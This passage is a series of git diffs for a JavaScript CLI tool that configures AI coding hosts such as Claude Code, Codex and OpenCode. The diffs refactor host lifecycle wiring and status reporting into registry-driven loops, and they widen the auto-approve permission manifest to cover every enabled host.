+built-in host SVGs Observability renders on session rows — and are reused byte-identically so a
 component looks the same everywhere. Every other component gets a **monogram tile**: its
 initial(s) on a rounded tile in its category hue. A monogram is an honest "no official mark"
 statement, not a stand-in logo; if an upstream later publishes a usable mark, swapping it in is

--- a/docs/ddd/ubiquitous-language.md
+++ b/docs/ddd/ubiquitous-language.md
@@ -140,8 +140,9 @@ runtime state is a chip word, never a prose word. See
 
 ## Usage rules
 
-- Say **host** when referring to Claude Code, Codex, OpenCode, session drivers, leadership, or
-  activity routing.
+- Say **host** for any session driver or activity-routing target the registry recognizes —
+  Claude Code, Codex, and OpenCode are the built-in examples, not the exhaustive list — and for
+  leadership.
 - Say **inference provider** when referring to Anthropic, OpenAI, OpenRouter, Ollama, billing,
   provider credentials, or inference endpoints.
 - Qualify **projection** as configuration projection or read-model projection when ambiguity is

--- a/src/commands/setup.mjs
+++ b/src/commands/setup.mjs
@@ -14,7 +14,7 @@ import { reconcileGuidance } from '../lib/blocks.mjs';
 import { register as mcpRegister, applyExclusions } from '../lib/mcp.mjs';
 import { reconcileOpencodeGuidance } from '../lib/opencode.mjs';
 import { runLifecycle } from '../lib/adapters/lifecycle.mjs';
-import { hostsWithLifecycle, lifecycleAdapterFor } from '../lib/adapters/lifecycle-registry.mjs';
+import { builtinHostsWithLifecycle, lifecycleAdapterFor } from '../lib/adapters/lifecycle-registry.mjs';
 import { loadKitConfig, saveKitConfig } from '../lib/config.mjs';
 import { HOSTS, applyHosts, applyProviders, hostInstallState, installHost, applyAqeRouter, seedActivityRoutesIfMultiHost, printActivityRoutingTable, aqeSupportsAgentOverrides, ensureCodexMcp, ensureRufloMcpInCodex, applySetupHostFlags, bothHostsEnabled } from '../lib/providers.mjs';
 import { installedVersion } from '../lib/versions.mjs';
@@ -216,14 +216,18 @@ export async function run_machine({ flags, pkgRoot, cfg }) {
   // 6b. host lifecycle wiring — config-file MCP + skills, lifecycle plugin,
   //     converted agents, platform skill (each adapter owns its own surfaces
   //     — opencode.mjs for opencode). Registry-driven: loops
-  //     hostsWithLifecycle() rather than naming opencode, so a second
-  //     lifecycle host needs no new branch here. Only when the CLI is
-  //     actually present: a declined/failed install must not leave a
+  //     builtinHostsWithLifecycle() rather than naming opencode, so a second
+  //     BUILT-IN lifecycle host needs no new branch here. Only when the CLI
+  //     is actually present: a declined/failed install must not leave a
   //     freshly-created config home behind (codex-review #4). The result
   //     SHAPE consumed below (stack.oc/plugin/agents/skill) is still
   //     opencode's own — the lifecycle contract doesn't mandate a common
-  //     `apply()` result shape across hosts.
-  for (const hostId of hostsWithLifecycle()) {
+  //     `apply()` result shape across hosts. builtinHostsWithLifecycle()
+  //     (not hostsWithLifecycle()) deliberately excludes admitted external
+  //     hosts: this loop body is opencode-shaped, and external lifecycle
+  //     execution graduates in a later wave alongside a shape-agnostic body
+  //     (see lifecycle-registry.mjs's registerAdmittedLifecycle comment).
+  for (const hostId of builtinHostsWithLifecycle()) {
     if (!cfg.integrations?.hosts?.[hostId]) continue;
     if (!(await have(hostId))) {
       const pkg = HOSTS.find((h) => h.id === hostId)?.pkg ?? hostId;

--- a/src/commands/setup.mjs
+++ b/src/commands/setup.mjs
@@ -12,8 +12,9 @@ import * as heal from '../lib/heal.mjs';
 import { fixStatusline } from '../lib/statusline.mjs';
 import { reconcileGuidance } from '../lib/blocks.mjs';
 import { register as mcpRegister, applyExclusions } from '../lib/mcp.mjs';
-import { OPENCODE_LIFECYCLE_ADAPTER, reconcileOpencodeGuidance } from '../lib/opencode.mjs';
+import { reconcileOpencodeGuidance } from '../lib/opencode.mjs';
 import { runLifecycle } from '../lib/adapters/lifecycle.mjs';
+import { hostsWithLifecycle, lifecycleAdapterFor } from '../lib/adapters/lifecycle-registry.mjs';
 import { loadKitConfig, saveKitConfig } from '../lib/config.mjs';
 import { HOSTS, applyHosts, applyProviders, hostInstallState, installHost, applyAqeRouter, seedActivityRoutesIfMultiHost, printActivityRoutingTable, aqeSupportsAgentOverrides, ensureCodexMcp, ensureRufloMcpInCodex, applySetupHostFlags, bothHostsEnabled } from '../lib/providers.mjs';
 import { installedVersion } from '../lib/versions.mjs';
@@ -23,7 +24,7 @@ import { readJson, writeJsonWithBackup } from '../lib/settings.mjs';
 import { withDb } from '../lib/sqlite.mjs';
 import { findMemoryEntry } from '../lib/project-memory.mjs';
 import {
-  setupTrustManifest, trustChangesForHost, trustManifestLines,
+  setupTrustManifest, trustManifestLines,
 } from '../lib/trust-manifest.mjs';
 import * as paths from '../lib/paths.mjs';
 import { ok, warn, fail, info, heading, bold, dim, reportOutcome } from '../lib/output.mjs';
@@ -91,18 +92,26 @@ const ask = async (q, dflt, yes) => {
   return a === '' ? dflt : a.startsWith('y');
 };
 
-export const PROJECT_PERMISSION_MANIFEST = Object.freeze(
-  trustChangesForHost('claude', { kind: 'auto-approve' }).map((entry) => ({
-    owner: entry.owner, rule: entry.value, effect: entry.effect,
-  })),
-);
-
-export function projectPermissionManifest(cfg) {
-  const claude = setupTrustManifest(cfg, { project: true })
-    .find((group) => group.hostId === 'claude');
-  return (claude?.changes ?? []).filter((entry) => entry.kind === 'auto-approve')
+// The authorized/disclosed auto-approve set is the UNION across every
+// enabled host's trust manifest, not claude's alone (F-04) — a host whose
+// auto-approve rules don't gate on enablement (requiresHostEnabled: false,
+// claude's posture today) always contributes; an opt-in host (opencode,
+// codex, or a future one) only contributes once cfg actually enables it.
+// `hosts` is injectable so tests can prove a second host's rule survives
+// removeUndisclosedPermissions through the same seam trust-manifest.test.mjs
+// uses for host-registry-construction tests.
+export function projectPermissionManifest(cfg, /** @type {{hosts?: any[]}} */ { hosts } = {}) {
+  const manifest = setupTrustManifest(cfg, { project: true, ...(hosts ? { hosts } : {}) });
+  return manifest.flatMap((group) => group.changes)
+    .filter((entry) => entry.kind === 'auto-approve')
     .map((entry) => ({ owner: entry.owner, rule: entry.value, effect: entry.effect }));
 }
+
+// The baseline (no non-default host enabled) authorized set — identical to
+// "claude's rules" today because every claude auto-approve change sets
+// requiresHostEnabled: false, but now derived through the same registry-
+// driven path as projectPermissionManifest rather than hardcoded to claude.
+export const PROJECT_PERMISSION_MANIFEST = Object.freeze(projectPermissionManifest({}));
 
 export function discloseSetupTrust(cfg, { project = false } = {}) {
   const manifest = setupTrustManifest(cfg, { project });
@@ -204,35 +213,43 @@ export async function run_machine({ flags, pkgRoot, cfg }) {
     }
   }
 
-  // 6b. opencode host wiring — config-file MCP + skills, lifecycle plugin,
-  //     converted agents, platform skill (opencode.mjs owns all of it). Only
-  //     when the CLI is actually present: a declined/failed install must not
-  //     leave a freshly-created config home behind (codex-review #4).
-  if (cfg.integrations?.hosts?.opencode) {
-    if (!(await have('opencode'))) {
-      warn('opencode: enabled but CLI not installed — wiring skipped (re-run `ak sync` after installing opencode-ai)');
-    } else {
-      const lifecycle = await runLifecycle({
-        adapter: OPENCODE_LIFECYCLE_ADAPTER, action: 'apply', cfg, options: { pkgRoot },
-      });
-      const stack = lifecycle.result;
-      (stack.oc.ok ? ok : warn)(`opencode: ${stack.oc.detail}`);
-      if (stack.oc.fatal) {
-        warn(`opencode plugin/agents/skill/guidance skipped — ${stack.oc.detail}`);
-        return false;
-      }
-      ok(`opencode plugin: ${stack.plugin.detail}`);
-      ok(`opencode agents: ${stack.agents.detail}`);
-      if (stack.skill.changed) ok(`opencode skill: ${stack.skill.detail}`);
-      // guidance blocks for the opencode AGENTS.md land NOW (codex-review #18)
-      // — not on the next status-driven reconcile. Same shared reconcile pick
-      // and off use, so every command converges guidance identically.
-      const guidance = await reconcileOpencodeGuidance({ pkgRoot, cfg, cwd: process.cwd(), enabled: true });
-      ok(`opencode guidance: ${guidance.detail.replace(/^guidance: /, '')}`);
-      // opencode loads config/plugins/MCP/agents once at startup — say so now,
-      // or the user files "hooks don't work" issues (observed live).
-      info('restart opencode to load the hooks + MCP servers (loaded once at startup)');
+  // 6b. host lifecycle wiring — config-file MCP + skills, lifecycle plugin,
+  //     converted agents, platform skill (each adapter owns its own surfaces
+  //     — opencode.mjs for opencode). Registry-driven: loops
+  //     hostsWithLifecycle() rather than naming opencode, so a second
+  //     lifecycle host needs no new branch here. Only when the CLI is
+  //     actually present: a declined/failed install must not leave a
+  //     freshly-created config home behind (codex-review #4). The result
+  //     SHAPE consumed below (stack.oc/plugin/agents/skill) is still
+  //     opencode's own — the lifecycle contract doesn't mandate a common
+  //     `apply()` result shape across hosts.
+  for (const hostId of hostsWithLifecycle()) {
+    if (!cfg.integrations?.hosts?.[hostId]) continue;
+    if (!(await have(hostId))) {
+      const pkg = HOSTS.find((h) => h.id === hostId)?.pkg ?? hostId;
+      warn(`${hostId}: enabled but CLI not installed — wiring skipped (re-run \`ak sync\` after installing ${pkg})`);
+      continue;
     }
+    const lifecycle = await runLifecycle({
+      adapter: lifecycleAdapterFor(hostId), action: 'apply', cfg, options: { pkgRoot },
+    });
+    const stack = lifecycle.result;
+    (stack.oc.ok ? ok : warn)(`opencode: ${stack.oc.detail}`);
+    if (stack.oc.fatal) {
+      warn(`opencode plugin/agents/skill/guidance skipped — ${stack.oc.detail}`);
+      return false;
+    }
+    ok(`opencode plugin: ${stack.plugin.detail}`);
+    ok(`opencode agents: ${stack.agents.detail}`);
+    if (stack.skill.changed) ok(`opencode skill: ${stack.skill.detail}`);
+    // guidance blocks for the opencode AGENTS.md land NOW (codex-review #18)
+    // — not on the next status-driven reconcile. Same shared reconcile pick
+    // and off use, so every command converges guidance identically.
+    const guidance = await reconcileOpencodeGuidance({ pkgRoot, cfg, cwd: process.cwd(), enabled: true });
+    ok(`opencode guidance: ${guidance.detail.replace(/^guidance: /, '')}`);
+    // opencode loads config/plugins/MCP/agents once at startup — say so now,
+    // or the user files "hooks don't work" issues (observed live).
+    info('restart opencode to load the hooks + MCP servers (loaded once at startup)');
   }
 
   // 7. frontier host hint — codex detected but not enabled (opt-in via `ak host pick`)

--- a/src/commands/status.mjs
+++ b/src/commands/status.mjs
@@ -24,6 +24,7 @@ import { coherence as adbCoherence } from '../lib/agentdb.mjs';
 import { readJson } from '../lib/settings.mjs';
 import { have } from '../lib/exec.mjs';
 import { HOSTS, settingsTarget, isDefault, managedEnv, MANAGED_ENV_KEYS, hostInstallState, hostAuthState, bothHostsEnabled, aqeRouterFile, aqeSupportsAgentOverrides, credentialGaps, collectIntegrationFacts } from '../lib/providers.mjs';
+import { PROVIDER_REGISTRY } from '../lib/adapters/index.mjs';
 import { configuredPolicyToAgentOverrides, agentOverridesDrift, routingSummary, divergedRoutes } from '../lib/routing.mjs';
 import { qeCourtShipped, readQeCourtConfig, validateCourtConfig } from '../lib/qeCourt.mjs';
 import { drift as ruvectorDrift } from '../lib/ruvector.mjs';
@@ -579,6 +580,19 @@ export async function collect({ pkgRoot, cwd = process.cwd() }) {
           rows.push(row('providers', 'ok', `aqe chain: ${chain.length}/${chain.length} rungs have credentials`));
         }
       }
+    }
+    // ADR-0028 F-29: local-openai is a local ($0) provider deliberately NOT
+    // projected to 'aqe' (unlike ollama, which is) — surface that asymmetry
+    // plainly so it reads as a fact, not a bug. Registry-driven (billing +
+    // projections), not an id check, so any future provider of the same
+    // shape gets the same treatment for free.
+    const providerById = Object.fromEntries(PROVIDER_REGISTRY.map((p) => [p.id, p]));
+    for (const binding of cfg.integrations?.bindings ?? []) {
+      const provider = providerById[binding.provider];
+      if (!provider || provider.billing !== 'local' || provider.projections.includes('aqe')) continue;
+      const endpoint = binding.endpoint ? ` @ ${binding.endpoint}` : '';
+      rows.push(row('providers', 'info',
+        `local binding: ${binding.provider} via ${binding.host}${endpoint} (${provider.billing} $0; not an AQE provider type)`));
     }
   } catch (e) {
     rows.push(row('providers', 'warn', `provider check unavailable: ${e.message}`));

--- a/src/commands/status.mjs
+++ b/src/commands/status.mjs
@@ -58,6 +58,130 @@ Examples:
 
 const row = (subsystem, level, message, fix = null) => ({ subsystem, level, message, fix });
 
+// Per-host status DETAIL rows — beyond the generic install/auth rows the
+// `hosts` loop in collect() already renders from facts for every host alike.
+// A detail renderer owns everything specific to how ONE host proves itself
+// wired (config files, lifecycle bridges, converted artifacts, …); the
+// opencode-specific PROBES/MESSAGES live in the renderer below and in
+// lib/opencode.mjs, never in the dispatch loop itself. Adding a fourth host
+// means adding (or not adding) a table entry here — the loop that walks this
+// table never changes.
+async function opencodeDetailRows({ cfg, pkgRoot, facts }) {
+  const rows = [];
+  try {
+    if (!facts.hosts?.opencode?.present) {
+      rows.push(row('opencode', 'warn', 'enabled but opencode CLI not installed', 'sync installs opencode-ai (hosts step)'));
+    } else {
+      const source = catalogSource({ override: cfg.integrations?.ownership?.opencode?.catalogDir });
+      const st = opencodeMcpStatus(cfg);
+      const conv = st.parseError ? null : await opencodeConverged(cfg);
+      if (st.parseError) {
+        rows.push(row('opencode', 'warn',
+          'opencode.json is not plain JSON (JSONC comments?) — ak refuses to touch it',
+          'merge the ak wiring manually'));
+      } else if (!st.exists || !st.claudeFlow) {
+        rows.push(row('opencode', 'warn',
+          `opencode.json wiring incomplete (${[!st.exists ? 'no config file' : null, !st.claudeFlow ? 'claude-flow MCP missing' : null].filter(Boolean).join(', ')})`,
+          'sync writes the opencode wiring'));
+      } else if (!conv?.converged) {
+        rows.push(row('opencode', 'warn',
+          `opencode.json wiring drifted (${(conv?.reasons ?? []).slice(0, 3).join('; ')}${(conv?.reasons?.length ?? 0) > 3 ? '…' : ''})`,
+          'sync re-applies the opencode wiring'));
+      } else {
+        rows.push(row('opencode', 'ok',
+          `opencode.json converged (claude-flow${st.brain ? ' + ruvnet-brain' : ''} MCP, ${st.paths?.length ?? 0} skills path(s))${st.owned ? '' : ' — pre-existing (not ak-managed)'}`));
+      }
+      const receiptState = opencodeArtifactReceiptState(cfg.integrations?.ownership?.opencode?.managed);
+      const artifactReceipts = receiptState.receipts;
+      if (receiptState.adoptionBlocked) {
+        rows.push(row('opencode', 'warn',
+          'artifact receipt ledger is malformed — ownership adoption blocked; artifacts left untouched',
+          'repair integrations.ownership.opencode.managed.artifacts in kit.json or restore it from backup'));
+      }
+      const plug = pluginStatus({
+        pkgRoot, receipt: artifactReceipts.plugin,
+        adoptionBlocked: receiptState.adoptionBlocked,
+      });
+      if (!receiptState.adoptionBlocked && plug.adoptable) {
+        rows.push(row('opencode', 'warn',
+          'lifecycle plugin is exact and marker-bearing but lacks an ownership receipt',
+          'sync adopts it into the receipt ledger without rewriting it'));
+      } else if (!receiptState.adoptionBlocked && plug.foreign) {
+        rows.push(row('opencode', 'info', 'lifecycle plugin slot occupied by a user-owned ruflo-hooks.js — ak leaves it alone'));
+      } else if (!receiptState.adoptionBlocked && !plug.present) {
+        rows.push(row('opencode', 'warn', 'lifecycle plugin (ruflo-hooks.js) not deployed', 'sync deploys it'));
+      } else if (!receiptState.adoptionBlocked && !plug.current) {
+        rows.push(row('opencode', 'warn', 'lifecycle plugin out of date', 'sync rewrites it'));
+      }
+      const ag = agentsStatus({
+        source, receipts: artifactReceipts.agents,
+        stampReceipt: artifactReceipts.agentStamp,
+        adoptionBlocked: receiptState.agentsAdoptionBlocked,
+      });
+      if (!receiptState.adoptionBlocked && ag.adoptable) {
+        rows.push(row('opencode', 'warn',
+          `${ag.count} exact marker-bearing agents or stamp lack ownership receipts`,
+          'sync adopts them into the receipt ledger without rewriting them'));
+      } else if (!receiptState.adoptionBlocked && ag.count === 0 && !source) {
+        rows.push(row('opencode', 'warn', 'no ruflo catalog source (marketplace clone or @claude-flow/cli)', 'install ruflo (or claude marketplace) for the agent catalog'));
+      } else if (!receiptState.adoptionBlocked && ag.count === 0) {
+        rows.push(row('opencode', 'warn', 'no converted ruflo agents', 'sync converts the ruflo agent set'));
+      } else if (!receiptState.adoptionBlocked && ag.modified) {
+        rows.push(row('opencode', 'info',
+          `${ag.count} converted agents include user edits — ak leaves those files alone`));
+      } else if (!receiptState.adoptionBlocked && ag.stale) {
+        rows.push(row('opencode', 'warn',
+          `${ag.count} agents from ${ag.stampedId ?? 'unknown source'}, current source is ${ag.currentId ?? 'none'}`,
+          'sync re-converts the agent set'));
+      } else if (!receiptState.adoptionBlocked) {
+        rows.push(row('opencode', 'ok', `${ag.count} converted agents (${ag.currentId})`));
+      }
+      const sk = skillStatus({
+        source, receipt: artifactReceipts.skill,
+        adoptionBlocked: receiptState.adoptionBlocked,
+      });
+      if (!receiptState.adoptionBlocked && sk.adoptable) {
+        rows.push(row('opencode', 'warn',
+          'platform skill is exact and marker-bearing but lacks an ownership receipt',
+          'sync adopts it into the receipt ledger without rewriting it'));
+      } else if (!receiptState.adoptionBlocked && sk.foreign) {
+        rows.push(row('opencode', 'info', 'skills/ruflo/SKILL.md is user-owned — ak leaves it alone'));
+      } else if (!receiptState.adoptionBlocked && source?.hasPlatformSkill && !sk.present) {
+        rows.push(row('opencode', 'warn', 'platform skill (skills/ruflo/SKILL.md) not deployed', 'sync deploys it'));
+      } else if (!receiptState.adoptionBlocked && source?.hasPlatformSkill && !sk.current) {
+        rows.push(row('opencode', 'warn', 'platform skill out of date', 'sync re-deploys it'));
+      }
+    }
+  } catch (e) {
+    rows.push(row('opencode', 'warn', `opencode check unavailable: ${e.message}`));
+  }
+  return rows;
+}
+
+// Dispatch table: host id → detail renderer. CONTRACT: a renderer must catch
+// its own errors and degrade to a warn row — the dispatch loop deliberately
+// has no catch, so an uncaught throw would take down ALL of collect(), not
+// just this host. A host absent from this table
+// gets no detail rows here (its install/auth state still comes from the
+// `hosts` loop, which is already host-neutral). This is the ONLY place a new
+// host's status detail wiring gets registered.
+const HOST_DETAIL_RENDERERS = { opencode: opencodeDetailRows };
+
+/** Host-neutral dispatch loop: walks `renderers` (defaults to the table
+ *  above) and, for each host enabled in cfg, calls its renderer with the
+ *  shared facts snapshot. Exported (not just used internally) so a test can
+ *  prove a synthetic host renders through this exact loop — with no host-id
+ *  branching anywhere in the loop body — by injecting its own renderers map
+ *  instead of reaching into module internals. */
+export async function renderHostDetailRows({ cfg, pkgRoot, facts, renderers = HOST_DETAIL_RENDERERS }) {
+  const rows = [];
+  for (const [hostId, renderer] of Object.entries(renderers)) {
+    if (!cfg.integrations?.hosts?.[hostId]) continue;
+    rows.push(...(await renderer({ cfg, pkgRoot, facts, hostId })));
+  }
+  return rows;
+}
+
 export async function collect({ pkgRoot, cwd = process.cwd() }) {
   const rows = [];
   const cfg = loadKitConfig();
@@ -400,100 +524,13 @@ export async function collect({ pkgRoot, cwd = process.cwd() }) {
     rows.push(row('codex-plugins', 'warn', `Codex plugin check unavailable: ${e.message}`));
   }
 
-  // opencode host wiring — the third host's counterpart of the codex-mcp rows:
-  // opencode.json (mcp + skills.paths + permissions), the plugins/ lifecycle
-  // bridge, the converted agent set, and the platform skill. Only surfaces when
-  // the opencode host is enabled AND installed (enabled-but-absent is the
-  // hosts row's story); probes are file reads + one bin check (codex-review #4).
-  if (cfg.integrations?.hosts?.opencode) {
-    try {
-      if (!(await have('opencode'))) {
-        rows.push(row('opencode', 'warn', 'enabled but opencode CLI not installed', 'sync installs opencode-ai (hosts step)'));
-      } else {
-        const source = catalogSource({ override: cfg.integrations?.ownership?.opencode?.catalogDir });
-        const st = opencodeMcpStatus(cfg);
-        const conv = st.parseError ? null : await opencodeConverged(cfg);
-        if (st.parseError) {
-          rows.push(row('opencode', 'warn',
-            'opencode.json is not plain JSON (JSONC comments?) — ak refuses to touch it',
-            'merge the ak wiring manually'));
-        } else if (!st.exists || !st.claudeFlow) {
-          rows.push(row('opencode', 'warn',
-            `opencode.json wiring incomplete (${[!st.exists ? 'no config file' : null, !st.claudeFlow ? 'claude-flow MCP missing' : null].filter(Boolean).join(', ')})`,
-            'sync writes the opencode wiring'));
-        } else if (!conv?.converged) {
-          rows.push(row('opencode', 'warn',
-            `opencode.json wiring drifted (${(conv?.reasons ?? []).slice(0, 3).join('; ')}${(conv?.reasons?.length ?? 0) > 3 ? '…' : ''})`,
-            'sync re-applies the opencode wiring'));
-        } else {
-          rows.push(row('opencode', 'ok',
-            `opencode.json converged (claude-flow${st.brain ? ' + ruvnet-brain' : ''} MCP, ${st.paths?.length ?? 0} skills path(s))${st.owned ? '' : ' — pre-existing (not ak-managed)'}`));
-        }
-        const receiptState = opencodeArtifactReceiptState(cfg.integrations?.ownership?.opencode?.managed);
-        const artifactReceipts = receiptState.receipts;
-        if (receiptState.adoptionBlocked) {
-          rows.push(row('opencode', 'warn',
-            'artifact receipt ledger is malformed — ownership adoption blocked; artifacts left untouched',
-            'repair integrations.ownership.opencode.managed.artifacts in kit.json or restore it from backup'));
-        }
-        const plug = pluginStatus({
-          pkgRoot, receipt: artifactReceipts.plugin,
-          adoptionBlocked: receiptState.adoptionBlocked,
-        });
-        if (!receiptState.adoptionBlocked && plug.adoptable) {
-          rows.push(row('opencode', 'warn',
-            'lifecycle plugin is exact and marker-bearing but lacks an ownership receipt',
-            'sync adopts it into the receipt ledger without rewriting it'));
-        } else if (!receiptState.adoptionBlocked && plug.foreign) {
-          rows.push(row('opencode', 'info', 'lifecycle plugin slot occupied by a user-owned ruflo-hooks.js — ak leaves it alone'));
-        } else if (!receiptState.adoptionBlocked && !plug.present) {
-          rows.push(row('opencode', 'warn', 'lifecycle plugin (ruflo-hooks.js) not deployed', 'sync deploys it'));
-        } else if (!receiptState.adoptionBlocked && !plug.current) {
-          rows.push(row('opencode', 'warn', 'lifecycle plugin out of date', 'sync rewrites it'));
-        }
-        const ag = agentsStatus({
-          source, receipts: artifactReceipts.agents,
-          stampReceipt: artifactReceipts.agentStamp,
-          adoptionBlocked: receiptState.agentsAdoptionBlocked,
-        });
-        if (!receiptState.adoptionBlocked && ag.adoptable) {
-          rows.push(row('opencode', 'warn',
-            `${ag.count} exact marker-bearing agents or stamp lack ownership receipts`,
-            'sync adopts them into the receipt ledger without rewriting them'));
-        } else if (!receiptState.adoptionBlocked && ag.count === 0 && !source) {
-          rows.push(row('opencode', 'warn', 'no ruflo catalog source (marketplace clone or @claude-flow/cli)', 'install ruflo (or claude marketplace) for the agent catalog'));
-        } else if (!receiptState.adoptionBlocked && ag.count === 0) {
-          rows.push(row('opencode', 'warn', 'no converted ruflo agents', 'sync converts the ruflo agent set'));
-        } else if (!receiptState.adoptionBlocked && ag.modified) {
-          rows.push(row('opencode', 'info',
-            `${ag.count} converted agents include user edits — ak leaves those files alone`));
-        } else if (!receiptState.adoptionBlocked && ag.stale) {
-          rows.push(row('opencode', 'warn',
-            `${ag.count} agents from ${ag.stampedId ?? 'unknown source'}, current source is ${ag.currentId ?? 'none'}`,
-            'sync re-converts the agent set'));
-        } else if (!receiptState.adoptionBlocked) {
-          rows.push(row('opencode', 'ok', `${ag.count} converted agents (${ag.currentId})`));
-        }
-        const sk = skillStatus({
-          source, receipt: artifactReceipts.skill,
-          adoptionBlocked: receiptState.adoptionBlocked,
-        });
-        if (!receiptState.adoptionBlocked && sk.adoptable) {
-          rows.push(row('opencode', 'warn',
-            'platform skill is exact and marker-bearing but lacks an ownership receipt',
-            'sync adopts it into the receipt ledger without rewriting it'));
-        } else if (!receiptState.adoptionBlocked && sk.foreign) {
-          rows.push(row('opencode', 'info', 'skills/ruflo/SKILL.md is user-owned — ak leaves it alone'));
-        } else if (!receiptState.adoptionBlocked && source?.hasPlatformSkill && !sk.present) {
-          rows.push(row('opencode', 'warn', 'platform skill (skills/ruflo/SKILL.md) not deployed', 'sync deploys it'));
-        } else if (!receiptState.adoptionBlocked && source?.hasPlatformSkill && !sk.current) {
-          rows.push(row('opencode', 'warn', 'platform skill out of date', 'sync re-deploys it'));
-        }
-      }
-    } catch (e) {
-      rows.push(row('opencode', 'warn', `opencode check unavailable: ${e.message}`));
-    }
-  }
+  // Per-host status DETAIL rows (opencode.json wiring, lifecycle bridge,
+  // converted agents, platform skill, …) — the host-neutral counterpart of
+  // the codex-mcp rows above. Dispatches through HOST_DETAIL_RENDERERS; only
+  // a host both enabled AND registered there produces rows (enabled-but-
+  // absent is the CLI-presence branch inside its own renderer, sourced from
+  // the shared facts snapshot — no extra probing here or in the loop).
+  rows.push(...(await renderHostDetailRows({ cfg, pkgRoot, facts: integrationFacts })));
 
   // hosts (install-if-missing) — cheap: file read + `which`, no network.
   // An enabled host that is entirely absent is installable by sync; an external

--- a/src/commands/status.mjs
+++ b/src/commands/status.mjs
@@ -66,7 +66,10 @@ const row = (subsystem, level, message, fix = null) => ({ subsystem, level, mess
 // lib/opencode.mjs, never in the dispatch loop itself. Adding a fourth host
 // means adding (or not adding) a table entry here — the loop that walks this
 // table never changes.
-async function opencodeDetailRows({ cfg, pkgRoot, facts }) {
+// The loop also passes `hostId`; this renderer doesn't need it (it IS the
+// opencode renderer) but the signature admits it so the dispatch call site
+// typechecks for every renderer uniformly.
+async function opencodeDetailRows({ cfg, pkgRoot, facts, hostId: _hostId = 'opencode' } = /** @type {any} */ ({})) {
   const rows = [];
   try {
     if (!facts.hosts?.opencode?.present) {

--- a/src/commands/sync.mjs
+++ b/src/commands/sync.mjs
@@ -9,7 +9,7 @@ import { fixStatusline, helperStampStale } from '../lib/statusline.mjs';
 import { reconcileGuidance } from '../lib/blocks.mjs';
 import { register as mcpRegister, applyExclusions } from '../lib/mcp.mjs';
 import { runLifecycle } from '../lib/adapters/lifecycle.mjs';
-import { hostsWithLifecycle, lifecycleAdapterFor } from '../lib/adapters/lifecycle-registry.mjs';
+import { builtinHostsWithLifecycle, lifecycleAdapterFor } from '../lib/adapters/lifecycle-registry.mjs';
 import { listDaemons, staleDaemons, reap } from '../lib/daemons.mjs';
 import { loadKitConfig, saveKitConfig } from '../lib/config.mjs';
 import { commandHosts, applyHosts, applyProviders, hostInstallState, installHost, applyAqeRouter, seedActivityRoutesIfMultiHost, migrateRetiredRoutesInConfig, ensureCodexMcp, ensureRufloMcpInCodex, bothHostsEnabled } from '../lib/providers.mjs';
@@ -188,13 +188,15 @@ export async function run({ flags, pkgRoot, fetchLatest }) {
   // Runs BEFORE the blocks branch: the agents-opencode guidance target is gated
   // on the config home this branch creates — this order lets a fresh enable
   // converge guidance in the SAME sync (a second sync is then a true no-op).
-  // Registry-driven: loops hostsWithLifecycle() rather than naming opencode,
-  // so a second lifecycle host needs no new branch here. Only opencode is
-  // registered today, so this loop runs exactly once — byte-identical to the
-  // single-host branch it replaces. The result SHAPE consumed below
-  // (stack.oc/plugin/agents/skill) is still opencode's own — the lifecycle
-  // contract doesn't mandate a common `apply()` result shape across hosts.
-  for (const hostId of hostsWithLifecycle()) {
+  // Registry-driven: loops builtinHostsWithLifecycle() rather than naming
+  // opencode, so a second BUILT-IN lifecycle host needs no new branch here.
+  // Only opencode is registered today, so this loop runs exactly once —
+  // byte-identical to the single-host branch it replaces. The result SHAPE
+  // consumed below (stack.oc/plugin/agents/skill) is still opencode's own —
+  // the lifecycle contract doesn't mandate a common `apply()` result shape
+  // across hosts. builtinHostsWithLifecycle() (not hostsWithLifecycle())
+  // deliberately excludes admitted external hosts — see lifecycle-registry.mjs.
+  for (const hostId of builtinHostsWithLifecycle()) {
     if (!subsystems.has(hostId) || !cfg.integrations?.hosts?.[hostId]) continue;
     if (!(await have(hostId))) {
       info(`${hostId}: enabled but CLI not installed — wiring skipped (hosts step installs it)`);

--- a/src/commands/sync.mjs
+++ b/src/commands/sync.mjs
@@ -8,8 +8,8 @@ import { have } from '../lib/exec.mjs';
 import { fixStatusline, helperStampStale } from '../lib/statusline.mjs';
 import { reconcileGuidance } from '../lib/blocks.mjs';
 import { register as mcpRegister, applyExclusions } from '../lib/mcp.mjs';
-import { OPENCODE_LIFECYCLE_ADAPTER } from '../lib/opencode.mjs';
 import { runLifecycle } from '../lib/adapters/lifecycle.mjs';
+import { hostsWithLifecycle, lifecycleAdapterFor } from '../lib/adapters/lifecycle-registry.mjs';
 import { listDaemons, staleDaemons, reap } from '../lib/daemons.mjs';
 import { loadKitConfig, saveKitConfig } from '../lib/config.mjs';
 import { commandHosts, applyHosts, applyProviders, hostInstallState, installHost, applyAqeRouter, seedActivityRoutesIfMultiHost, migrateRetiredRoutesInConfig, ensureCodexMcp, ensureRufloMcpInCodex, bothHostsEnabled } from '../lib/providers.mjs';
@@ -188,23 +188,30 @@ export async function run({ flags, pkgRoot, fetchLatest }) {
   // Runs BEFORE the blocks branch: the agents-opencode guidance target is gated
   // on the config home this branch creates — this order lets a fresh enable
   // converge guidance in the SAME sync (a second sync is then a true no-op).
-  if (subsystems.has('opencode') && cfg.integrations?.hosts?.opencode) {
-    if (!(await have('opencode'))) {
-      info('opencode: enabled but CLI not installed — wiring skipped (hosts step installs it)');
-    } else {
-      const lifecycle = await runLifecycle({
-        adapter: OPENCODE_LIFECYCLE_ADAPTER, action: 'apply', cfg, options: { pkgRoot },
-      });
-      const stack = lifecycle.result;
-      // persist the markers on ANY refresh (a converged file whose kit.json
-      // markers are stale/missing still needs the save, or the next teardown
-      // cannot prove ownership — codex-review r3), not only on file changes.
-      if (stack.oc.changed || stack.markersChanged) saveKitConfig(cfg);
-      if (stack.oc.changed || !stack.oc.ok) report('opencode', stack.oc);
-      report('opencode plugin', stack.plugin);
-      report('opencode agents', stack.agents);
-      if (stack.skill.changed || !stack.skill.ok) report('opencode skill', stack.skill);
+  // Registry-driven: loops hostsWithLifecycle() rather than naming opencode,
+  // so a second lifecycle host needs no new branch here. Only opencode is
+  // registered today, so this loop runs exactly once — byte-identical to the
+  // single-host branch it replaces. The result SHAPE consumed below
+  // (stack.oc/plugin/agents/skill) is still opencode's own — the lifecycle
+  // contract doesn't mandate a common `apply()` result shape across hosts.
+  for (const hostId of hostsWithLifecycle()) {
+    if (!subsystems.has(hostId) || !cfg.integrations?.hosts?.[hostId]) continue;
+    if (!(await have(hostId))) {
